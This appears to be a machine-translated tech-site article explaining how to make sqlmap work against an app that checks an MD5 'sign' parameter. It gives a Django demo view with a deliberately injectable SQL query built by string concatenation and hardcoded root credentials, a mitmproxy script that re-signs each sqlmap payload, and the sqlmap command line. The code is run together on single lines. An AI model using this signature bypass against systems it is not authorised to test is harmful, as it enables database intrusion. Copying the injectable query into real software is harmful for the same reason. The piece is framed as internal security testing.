Shulou(Shulou.com)05/31 Report--

The editor today takes you to understand the ideas of sqlmap in dealing with sign encryption. The knowledge points in the article are introduced in great detail. Friends who think it is helpful can browse the content of the article together with the editor, hoping to help more friends who want to solve this problem to find the answer to the problem. Let's follow the editor to learn more about "sqlmap's ideas for dealing with sign encryption".

When I tested the company's APP, I found that we added a 32-bit character to all the parameter contents and ended up with MD5 encryption. Because the process of APP processing is first to verify whether sign is correct, and if the signature verification fails, there is no access to the database at all, so in order to test it with SQLMAP, a script for proxy data is written to encrypt and replace its parameter contents and 32 characters after intercepting the packet.

Note: this script is suitable for internal systems because you can know the encryption process, or you can get the encryption method of the front-end JS.

First of all, I use Django to write a program to simulate the company's system, the process is to obtain the id and token of POST, and add custom encrypted characters, because the data obtained by Django has already gone through URLDECODE, so I use quote to URLENCODE the content of the parameter id, then encrypt it with MD5, and finally verify whether the requested token is consistent with the content of the parameter.

Views.pyfrom django.shortcuts import renderfrom django.http import JsonResponse# Create your views here.import hashlibimport MySQLdbimport urllibfrom django.views.decorators.csrf import csrf_exempt@csrf_exemptdef index (request): id = request.POST.get ("id") token = request.POST.get ("token") str = urllib.quote (id+ "test") print (str) hl = hashlib.md5 () hl.update (str) token1 = hl.hexdigest () print token1 If token = = token1: db = MySQLdb.connect ("localhost" "root", "123456", "testdb" Charset='utf8') cursor = db.cursor () cursor.execute ("select * from t_userinfo where id=" + id) data = cursor.fetchone () print "Database version:% s"% data db.close () return JsonResponse ({"msg": "verity ok"}) else: return JsonResponse ({"msg": "verity error."}) models.pyclass userinfo (models.Model ): name = models.CharField (max_length=100) age = models.CharField (max_length=100)

Using BP to grab the package, you can see the status returned when the verification is correct and the verification error.

When testing with SQLMAP, it was found that the test could not be done.

So I use mitmproxy,mitmproxy as an interactive console interface for intermediate agents HTTP and HTTPS, as detailed here.

If you want to modify, only modify the wsproxy_request_handle function, because this function is to intercept the data and tamper with the data process, the other code is the configuration process and running process, do not need to modify.

From mitmproxy.proxy.server import ProxyServerfrom mitmproxy import flow, controllerfrom mitmproxy import flow, proxy, controller, optionsimport hashlibimport redef md5cr (str): hl = hashlib.md5 () hl.update (str.encode (encoding='utf-8')) return hl.hexdigest () class WSProxy (flow.FlowMaster): def _ init__ (self, opts, server, state, unsave_data): super (WSProxy, self). _ _ init__ (opts, server) State) self.unsave_data = unsave_data def run (self): try: print ("start") flow.FlowMaster.run (self) except KeyboardInterrupt: self.shutdown () @ controller.handler def request (self, f): wsproxy_request_handle (f) @ controller.handler def response (self) F): wsproxy_response_handle (f) # parser = ResponseParser (f) # insert_result (parser.parser_data ()) def wsproxy_request_handle (flow): "wyproxy send data to server before processing" try: data = flow.request.content.split ("&") t = "" for i in data: if i.split ("" = ") [0]! =" token ": t = t+i.split (" = ") [1] str = t +" test "sign = md5cr (str) print (str) data1 = re.match ((. *?) token=" Flow.request.content) .group () flow.request.content = data1+sign print (flow.request.content) except IndexError: passdef wsproxy_response_handle (flow): passport = 8888 # mode= 'regular' # mode=regularopts = options.Options (listen_port=int (port), mode=mode, cadir= ". / ssl/",) unsave_data = Falseconfig = proxy.ProxyConfig (opts) state = flow.State () server = ProxyServer (config) m = WSProxy (opts Server, state, unsave_data) m.run ()

Run the above script to use the SQLMAP proxy on the upper http://IP:8888, and then the script will automatically process the payload of the sqlmap and generate the corresponding sign.

Python sqlmap.py-r e:\\ 1.txt-p id-dbms=mysql-batch-proxy= http://192.168.1.240:8888

The above is the process of generating payload and sign, and the following is the process of requesting an payload error.

Thank you for your reading, the above is the whole content of "the idea of sqlmap dealing with sign encryption", learn friends to hurry up to operate it. I believe that the editor will certainly bring you better quality articles. Thank you for your support to the website!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.